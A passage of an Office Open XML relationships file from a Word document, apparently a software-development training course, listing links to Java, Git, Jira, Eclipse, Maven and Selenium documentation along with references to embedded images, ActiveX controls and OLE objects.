Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-add" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oracle.com/technetwork/java/javase/downloads/index.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX6.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX27.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX48.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/technetwork/java/javase/downloads/index.html." TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/8/docs/technotes/tools/windows/jdb.html." TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/creating-and-running-your-first-java-application.html." TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository." TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.eclipse.org/downloads/" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-commit" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/eclipse/eclipse_create_java_package.htm." TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX17.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX38.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/javaOO/classes.html." TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oracle.com/technetwork/java/javase/downloads/index.html" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/configuring-project-and-ide-settings.html." TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jiracoreserver073/creating-issues-and-sub-tasks-861257329.html." TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/searching-for-issues-764478280.html." TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlassian.com/software/jira/guides/getting-started/best-practices." TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://help.eclipse.org/2019-03/index.jsp" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://maven.apache.org/download.cgi" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX7.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX28.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX51.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX49.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/en/java/javase." TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/debugging-your-first-java-application.html." TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netbeans.org/kb/docs/java/quickstart.html." TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-add" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlassian.com/agile/tutorials/sprints." TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-reset" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX18.xml"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/eclipse/eclipse_create_java_class.htm." TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX39.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.javatpoint.com/java-comments." TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seleniumhq.org/projects/webdriver/" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netbeans.apache.org/download/index.html." TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.idalko.com/jira-workflow-best-practices." TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwareserver073/advanced-searching-861256227.html." TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-commit" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclipsesource.com/blogs/tutorials/egit-tutorial."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control" Target="activeX/activeX8.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/hamcrest/downloads/list" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX29.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX50.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX52.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notepad-plus-plus.org/download." TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/eclipse/eclipse_debugging_program.htm." TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclipsesource.com/blogs/tutorials/egit-tutorial." TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="cid:image001.jpg@01D40F86.D718AD60" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/advanced-searching-764478330.html." TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html." TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-checkout" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Systems_development_life_cycle." TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX19.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX40.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/nutsandbolts/expressions.html." TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://maven.apache.org/download.cgi" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netbeans.org/community/releases/82/install.html." TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jiracorecloud/working-with-boards-800712866.html." TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html." TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-reset" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/downloads." TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://maven.apache.org/download.cgi" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demoqa.com/category/interactions/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX9.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX30.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX53.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/package/index.html." TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX41.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.jpeg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/using-git-integration.html." TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/downloads." TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html." TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/hamcrest/downloads/list" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Systems_development_life_cycle." TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX20.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/nutsandbolts/variables.html." TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX31.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.eclipse.org/downloads/" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/netbeans/nb82/netbeans/NBDAG/working_nbeans.htm." TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html." TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jiracorecloud/working-with-issues-765593800.html." TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-checkout" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-format-patch." TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netbeans.org/features." TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.emf"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX10.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX54.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eclipse.org/downloads." TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX21.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX42.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demoqa.com/droppable/" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://howtoubuntu.org/how-to-install-lamp-on-ubuntu" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Systems_development_life_cycle." TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Getting-Started-Installing-Git." TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/deploying-a-release-764478183.html." TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.idalko.com/jira-workflow-best-practices." TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.wmf"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikibooks.org/wiki/Introduction_to_Software_Engineering/Process/Life_Cycle." TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX11.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX32.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/nutsandbolts/opsummary.html." TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/hamcrest/downloads/list" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eclipse.org/eclipse/news/4.11/platform.php." TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlassian.com/agile/tutorials/issues." TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/watch-share-and-comment-on-issues-962349057.html." TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository." TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository." TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netbeans.apache.org/download/index.html." TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX1.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX55.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://javatutorialhq.com/java/java-hello-world." TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=tiPZGba2qJg" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpeg"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX22.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX43.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Getting-Started-First-Time-Git-Setup." TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/basic-searching-764478306.html." TargetMode="External"/><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hyperlink" Target="http://www.oracle.com/technetwork/java/javase/downloads/index.html" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.alytus.lt" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mrbool.com/java-data-type-conversion/29257." TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oracle.com/technetwork/java/javase/downloads/index.html" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/idea/features." TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX12.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX33.xml"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/adminjiracloud/issue-types-844500742.html" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlassian.com/agile/tutorials/sprints." TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Git-Branching-Branches-in-a-Nutshell." TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Getting-Started-First-Time-Git-Setup." TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/technetwork/java/codeconvtoc-136057.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX56.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/8/docs/technotes/tools/index.html." TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.emf"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eclipse.org/downloads/packages." TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX2.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX23.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX44.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikibooks.org/wiki/Introduction_to_Software_Engineering/Process/Life_Cycle." TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2/Customizing-Git-Git-Configuration." TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/searching-for-issues-764478280.html." TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/idea/documentation/" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/data/autoboxing.html." TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://maven.apache.org/download.cgi" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX13.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX34.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netbeans.org/features." TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlassian.com/project-management." TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html." TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="HTTPS://GITHUB.COM/ILUWATAR/JAVA-DESIGN-PATTERNS" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-init" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/facebook/react" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/8/docs/technotes/tools/index.html." TargetMode="External"/><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control" Target="activeX/activeX3.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX24.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX45.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.eclipse.org/Eclipse/Installation." TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/eclipse/eclipse_create_java_project.htm." TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-init" 